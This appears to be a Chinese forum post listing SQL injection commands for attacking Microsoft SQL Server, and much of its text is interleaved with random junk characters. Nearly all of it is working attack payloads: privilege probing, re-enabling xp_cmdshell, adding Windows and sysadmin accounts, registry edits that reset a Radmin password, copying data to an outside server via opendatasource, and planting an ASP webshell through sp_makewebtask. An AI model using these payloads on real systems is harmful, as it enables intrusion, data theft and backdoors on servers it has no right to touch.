阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
; s# K4 H  P5 V* R' kAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
6 x$ V% I* ~0 Y' f
4 s+ @( a& [+ \/ r0 }2 b) T+ n2 ^//检测是否有读取某数据库的权限
; Q. O8 r- Q" L0 @/ G3 p+ eand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

" O% L4 U* i( L- b) P# i4 E7 A
数字类型
: F2 ]+ t4 |4 w$ G8 t# Band char(124)%2Buser%2Bchar(124)=0
' t' N$ N0 P8 J% \
字符类型
# j4 K- W/ z8 a8 c7 r7 \! D' and char(124)%2Buser%2Bchar(124)=0 and ''='

- {* c* ^7 y$ ~+ S4 [搜索类型
( a8 s5 E+ p  Z3 a5 z# R; ^9 Q' and char(124)%2Buser%2Bchar(124)=0 and '%'='
; Y7 o  }# V; V. P$ T  \8 [. R
# g* V# ?! q  {1 f$ k9 p爆用户名
and user>0
' and user>0 and ''='
9 q$ w- }9 q  v- h
检测是否为SA权限
! d( q' F9 R7 W" Jand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
% h2 I, v. s0 V( r) \- @: bAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
: T! h9 V0 z: W3 L. R! ?8 s' |
检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

; c+ o5 h6 y; S& u( b7 {' N恢复 xp_cmdshell
- q. e- L8 b5 ~+ _6 M) p;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
$ X; V8 g1 _: Z; Z5 y4 S
+ T5 F! W* z- C3 N, `
8 X5 }, z0 t7 A7 xselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
* F) H( }; Q* u$ k/ q7 H- @
//-----------------------
//      执行命令
2 c4 W3 c) M! M0 S" L3 f5 J//-----------------------
- k" C( o5 y: {首先开启沙盘模式：
: \2 [" I1 ]* |9 ~/ Zexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
' u5 ?# a- m0 s
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
7 g. k7 d5 p4 W# u( |" ]& b& ^
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 \! B' v# A# I% w
8 U; L& f$ N. ]4 i5 o% u1 ]4 g判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

3 n* }7 ?5 c1 j; g  J* C0 U写注册表
/ V8 q) D& d- c& g6 ]/ ~- s& P3 d, Dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 g6 J' }9 Q& W7 X  m6 x7 h
REG_SZ
& w/ D- t; ?/ h4 ?6 O7 A2 X
读注册表
9 C3 {$ N$ w5 ?- i; ^4 U# X$ jexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


; ?) S, e* ?% a/ h3 U+ {+ {数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
+ ]6 L' q! F' k) K8 }And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

) n7 ^; l8 J% l# }6 h# M添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
/ V# d8 w8 t; rexec master.dbo.sp_addsrvrolemember test,sysadmin
6 }3 s6 N! D/ N
删除扩展存储过过程xp_cmdshell的语句:
: Z, ^; _5 U! I1 o- `exec sp_dropextendedproc 'xp_cmdshell'

5 t9 c0 {' }: ?& J$ C9 O- ~& W3 u7 S添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
4 s. V# H; j, [0 }
- S' v7 u! K: T" C& z
停掉或激活某个服务。

! n! c  D: @  {2 \' ^exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

5 g  A$ r( I6 {. a* Sdbo.xp_subdirs
! `. W4 m" H/ y
2 ^* c3 V+ G8 F1 b/ l5 e3 o只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab
0 {' U& t5 {/ k7 I9 b  J1 S
4 L$ z8 {  l; N: U! j5 k' Q将目标多个档案压缩到某个目标档案之内。
, h9 _- u9 T) @所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
% p! i  `- {. f' ^' s: a6 i
dbo.xp_makecab
' Q  I& O& M8 ]# `'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
4 n- S5 ?, t' K8 G
xp_terminate_process
% Y" ?& O& p. W* I3 W$ B
' P1 W( @- F/ N" I! {停掉某个执行中的程序，但赋予的参数是 Process ID。
% n0 o' o, \. k9 ]) b. y5 f利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484
6 V# F; X- j, t7 @6 M
xp_unpackcab
" L% J: E- Z! Q9 j4 `4 H/ ~- X9 V
2 ~: d2 t( T+ b' `# f解开压缩档。
; c0 S% b) t! z) M
# k: [" ~% i& J) uxp_unpackcab 'c:\test.cab','c:\temp',1
8 j( f. E1 @% C

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
: }. p2 G/ A3 Y& }% q2 {% C
create database lcx;
Create TABLE ku(name nvarchar(256) null);
4 O8 R2 h3 g/ _3 q% H7 }/ N) gCreate TABLE biao(id int NULL,name nvarchar(256) null);
! Z; c$ w; T+ l9 E
2 w$ d( \  ^- z$ t$ D8 `$ k//得到数据库名
/ l, L8 t, p9 p; J2 T" Rinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% M! I' J9 Y( i: ~

//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
+ }  _2 P( k+ i% A& \  f/ |http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
+ G; Q% _) B5 D0 p
; n* S2 @0 h" Y' c' @//更新表内容
/ m$ ^8 M% j6 m0 r9 DUpdate films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3